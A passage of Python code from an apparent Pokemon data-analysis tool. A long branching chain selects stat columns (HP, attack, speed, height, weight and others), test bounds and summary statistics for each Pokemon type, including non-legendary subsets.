stat_values = loaddata.trimmed_bug_types['total_points']
stat_stats = loaddata.trimmed_bug_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_bug_types['hp']
stat_stats = loaddata.trimmed_bug_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_bug_types['speed']
stat_stats = loaddata.trimmed_bug_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_bug_types['attack']
stat_stats = loaddata.trimmed_bug_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_bug_types['defense']
stat_stats = loaddata.trimmed_bug_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_bug_types['sp_attack']
stat_stats = loaddata.trimmed_bug_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_bug_types['sp_defense']
stat_stats = loaddata.trimmed_bug_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_bug_types['height_m']
stat_stats = loaddata.trimmed_bug_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_bug_types['weight_kg']
stat_stats = loaddata.trimmed_bug_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ghost pokemon
elif type_set == "17":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_ghost_types['total_points']
stat_stats = loaddata.trimmed_ghost_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ghost_types['hp']
stat_stats = loaddata.trimmed_ghost_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ghost_types['speed']
stat_stats = loaddata.trimmed_ghost_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ghost_types['attack']
stat_stats = loaddata.trimmed_ghost_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ghost_types['defense']
stat_stats = loaddata.trimmed_ghost_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ghost_types['sp_attack']
stat_stats = loaddata.trimmed_ghost_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_ghost_types['sp_defense']
stat_stats = loaddata.trimmed_ghost_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_ghost_types['height_m']
stat_stats = loaddata.trimmed_ghost_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_ghost_types['weight_kg']
stat_stats = loaddata.trimmed_ghost_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# steel pokemon
elif type_set == "18":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_steel_types['total_points']
stat_stats = loaddata.trimmed_steel_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_steel_types['hp']
stat_stats = loaddata.trimmed_steel_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_steel_types['speed']
stat_stats = loaddata.trimmed_steel_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_steel_types['attack']
stat_stats = loaddata.trimmed_steel_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_steel_types['defense']
stat_stats = loaddata.trimmed_steel_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_steel_types['sp_attack']
stat_stats = loaddata.trimmed_steel_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_steel_types['sp_defense']
stat_stats = loaddata.trimmed_steel_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_steel_types['height_m']
stat_stats = loaddata.trimmed_steel_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_steel_types['weight_kg']
stat_stats = loaddata.trimmed_steel_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# all pokemon (trimmed h & w)
elif type_set == "19":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.trimmed_total_points
stat_stats = loaddata.trimmed_total_points_stats
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_hp
stat_stats = loaddata.trimmed_hp_stats
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_speed
stat_stats = loaddata.trimmed_speed_stats
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_attack
stat_stats = loaddata.trimmed_attack_stats
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_defense
stat_stats = loaddata.trimmed_defense_stats
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_sp_attack
stat_stats = loaddata.trimmed_sp_attack_stats
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.trimmed_sp_defense
stat_stats = loaddata.trimmed_sp_defense_stats
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.trimmed_height
stat_stats = loaddata.trimmed_height_stats
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.trimmed_weight
stat_stats = loaddata.trimmed_weight_stats
unit = '(kg)'
else:
return
else:
return
elif data_set == "3": # non legendary pokemon
set_name = "Non Legendary Pokemon"
modifier = '(non legendary)'
if type_set == "1":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_grass_types['total_points']
stat_stats = loaddata.non_legendary_grass_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_grass_types['hp']
stat_stats = loaddata.non_legendary_grass_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_grass_types['speed']
stat_stats = loaddata.non_legendary_grass_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_grass_types['attack']
stat_stats = loaddata.non_legendary_grass_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_grass_types['defense']
stat_stats = loaddata.non_legendary_grass_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_grass_types['sp_attack']
stat_stats = loaddata.non_legendary_grass_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_grass_types['sp_defense']
stat_stats = loaddata.non_legendary_grass_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_grass_types['height_m']
stat_stats = loaddata.non_legendary_grass_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_grass_types['weight_kg']
stat_stats = loaddata.non_legendary_grass_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fire pokemon
elif type_set == "2":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_fire_types['total_points']
stat_stats = loaddata.non_legendary_fire_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fire_types['hp']
stat_stats = loaddata.non_legendary_fire_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fire_types['speed']
stat_stats = loaddata.non_legendary_fire_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fire_types['attack']
stat_stats = loaddata.non_legendary_fire_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fire_types['defense']
stat_stats = loaddata.non_legendary_fire_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fire_types['sp_attack']
stat_stats = loaddata.non_legendary_fire_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fire_types['sp_defense']
stat_stats = loaddata.non_legendary_fire_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_fire_types['height_m']
stat_stats = loaddata.non_legendary_fire_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_fire_types['weight_kg']
stat_stats = loaddata.non_legendary_fire_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# water pokemon
elif type_set == "3":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_water_types['total_points']
stat_stats = loaddata.non_legendary_water_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_water_types['hp']
stat_stats = loaddata.non_legendary_water_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_water_types['speed']
stat_stats = loaddata.non_legendary_water_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_water_types['attack']
stat_stats = loaddata.non_legendary_water_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_water_types['defense']
stat_stats = loaddata.non_legendary_water_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_water_types['sp_attack']
stat_stats = loaddata.non_legendary_water_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_water_types['sp_defense']
stat_stats = loaddata.non_legendary_water_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_water_types['height_m']
stat_stats = loaddata.non_legendary_water_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_water_types['weight_kg']
stat_stats = loaddata.non_legendary_water_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# electric pokemon
elif type_set == "4":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_electric_types['total_points']
stat_stats = loaddata.non_legendary_electric_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_electric_types['hp']
stat_stats = loaddata.non_legendary_electric_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_electric_types['speed']
stat_stats = loaddata.non_legendary_electric_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_electric_types['attack']
stat_stats = loaddata.non_legendary_electric_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_electric_types['defense']
stat_stats = loaddata.non_legendary_electric_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_electric_types['sp_attack']
stat_stats = loaddata.non_legendary_electric_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_electric_types['sp_defense']
stat_stats = loaddata.non_legendary_electric_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_electric_types['height_m']
stat_stats = loaddata.non_legendary_electric_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_electric_types['weight_kg']
stat_stats = loaddata.non_legendary_electric_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# psychic pokemon
elif type_set == "5":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_psychic_types['total_points']
stat_stats = loaddata.non_legendary_psychic_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_psychic_types['hp']
stat_stats = loaddata.non_legendary_psychic_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_psychic_types['speed']
stat_stats = loaddata.non_legendary_psychic_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_psychic_types['attack']
stat_stats = loaddata.non_legendary_psychic_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_psychic_types['defense']
stat_stats = loaddata.non_legendary_psychic_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_psychic_types['sp_attack']
stat_stats = loaddata.non_legendary_psychic_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_psychic_types['sp_defense']
stat_stats = loaddata.non_legendary_psychic_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_psychic_types['height_m']
stat_stats = loaddata.non_legendary_psychic_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_psychic_types['weight_kg']
stat_stats = loaddata.non_legendary_psychic_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# ice pokemon
elif type_set == "6":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_ice_types['total_points']
stat_stats = loaddata.non_legendary_ice_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ice_types['hp']
stat_stats = loaddata.non_legendary_ice_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ice_types['speed']
stat_stats = loaddata.non_legendary_ice_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ice_types['attack']
stat_stats = loaddata.non_legendary_ice_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ice_types['defense']
stat_stats = loaddata.non_legendary_ice_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ice_types['sp_attack']
stat_stats = loaddata.non_legendary_ice_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_ice_types['sp_defense']
stat_stats = loaddata.non_legendary_ice_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_ice_types['height_m']
stat_stats = loaddata.non_legendary_ice_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_ice_types['weight_kg']
stat_stats = loaddata.non_legendary_ice_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# dragon pokemon
elif type_set == "7":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_dragon_types['total_points']
stat_stats = loaddata.non_legendary_dragon_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dragon_types['hp']
stat_stats = loaddata.non_legendary_dragon_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dragon_types['speed']
stat_stats = loaddata.non_legendary_dragon_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dragon_types['attack']
stat_stats = loaddata.non_legendary_dragon_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dragon_types['defense']
stat_stats = loaddata.non_legendary_dragon_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dragon_types['sp_attack']
stat_stats = loaddata.non_legendary_dragon_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dragon_types['sp_defense']
stat_stats = loaddata.non_legendary_dragon_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_dragon_types['height_m']
stat_stats = loaddata.non_legendary_dragon_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_dragon_types['weight_kg']
stat_stats = loaddata.non_legendary_dragon_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# dark pokemon
elif type_set == "8":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_dark_types['total_points']
stat_stats = loaddata.non_legendary_dark_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dark_types['hp']
stat_stats = loaddata.non_legendary_dark_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dark_types['speed']
stat_stats = loaddata.non_legendary_dark_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dark_types['attack']
stat_stats = loaddata.non_legendary_dark_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dark_types['defense']
stat_stats = loaddata.non_legendary_dark_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dark_types['sp_attack']
stat_stats = loaddata.non_legendary_dark_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_dark_types['sp_defense']
stat_stats = loaddata.non_legendary_dark_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_dark_types['height_m']
stat_stats = loaddata.non_legendary_dark_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_dark_types['weight_kg']
stat_stats = loaddata.non_legendary_dark_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fairy pokemon
elif type_set == "9":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_fairy_types['total_points']
stat_stats = loaddata.non_legendary_fairy_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fairy_types['hp']
stat_stats = loaddata.non_legendary_fairy_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fairy_types['speed']
stat_stats = loaddata.non_legendary_fairy_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fairy_types['attack']
stat_stats = loaddata.non_legendary_fairy_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fairy_types['defense']
stat_stats = loaddata.non_legendary_fairy_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fairy_types['sp_attack']
stat_stats = loaddata.non_legendary_fairy_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fairy_types['sp_defense']
stat_stats = loaddata.non_legendary_fairy_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_fairy_types['height_m']
stat_stats = loaddata.non_legendary_fairy_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_fairy_types['weight_kg']
stat_stats = loaddata.non_legendary_fairy_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# normal pokemon
elif type_set == "10":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_normal_types['total_points']
stat_stats = loaddata.non_legendary_normal_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_normal_types['hp']
stat_stats = loaddata.non_legendary_normal_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_normal_types['speed']
stat_stats = loaddata.non_legendary_normal_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_normal_types['attack']
stat_stats = loaddata.non_legendary_normal_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_normal_types['defense']
stat_stats = loaddata.non_legendary_normal_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_normal_types['sp_attack']
stat_stats = loaddata.non_legendary_normal_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_normal_types['sp_defense']
stat_stats = loaddata.non_legendary_normal_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_normal_types['height_m']
stat_stats = loaddata.non_legendary_normal_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_normal_types['weight_kg']
stat_stats = loaddata.non_legendary_normal_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# fighting pokemon
elif type_set == "11":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_fighting_types['total_points']
stat_stats = loaddata.non_legendary_fighting_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fighting_types['hp']
stat_stats = loaddata.non_legendary_fighting_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fighting_types['speed']
stat_stats = loaddata.non_legendary_fighting_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fighting_types['attack']
stat_stats = loaddata.non_legendary_fighting_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fighting_types['defense']
stat_stats = loaddata.non_legendary_fighting_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fighting_types['sp_attack']
stat_stats = loaddata.non_legendary_fighting_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_fighting_types['sp_defense']
stat_stats = loaddata.non_legendary_fighting_types['sp_defense'].describe()
unit = ''
elif stat_set == "8": # height
stat_name = "Height(m)"
test_bounds = (0, 20)
stat_values = loaddata.non_legendary_fighting_types['height_m']
stat_stats = loaddata.non_legendary_fighting_types['height_m'].describe()
unit = '(m)'
elif stat_set == "9": # weight
stat_name = "Weight(kg)"
test_bounds = (1, 800)
stat_values = loaddata.non_legendary_fighting_types['weight_kg']
stat_stats = loaddata.non_legendary_fighting_types['weight_kg'].describe()
unit = '(kg)'
else:
return
# flying pokemon
elif type_set == "12":
if stat_set == "1": # stat totals
stat_name = "Stat Total"
test_bounds = (100, 600)
stat_values = loaddata.non_legendary_flying_types['total_points']
stat_stats = loaddata.non_legendary_flying_types['total_points'].describe()
unit = ''
elif stat_set == "2": # hp
stat_name = "HP"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_flying_types['hp']
stat_stats = loaddata.non_legendary_flying_types['hp'].describe()
unit = ''
elif stat_set == "3": # speed
stat_name = "Speed"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_flying_types['speed']
stat_stats = loaddata.non_legendary_flying_types['speed'].describe()
unit = ''
elif stat_set == "4": # attack
stat_name = "Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_flying_types['attack']
stat_stats = loaddata.non_legendary_flying_types['attack'].describe()
unit = ''
elif stat_set == "5": # defense
stat_name = "Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_flying_types['defense']
stat_stats = loaddata.non_legendary_flying_types['defense'].describe()
unit = ''
elif stat_set == "6": # sp.attack
stat_name = "Special Attack"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_flying_types['sp_attack']
stat_stats = loaddata.non_legendary_flying_types['sp_attack'].describe()
unit = ''
elif stat_set == "7": # sp.defense
stat_name = "Special Defense"
test_bounds = (20, 256)
stat_values = loaddata.non_legendary_flying_types['sp_defense']
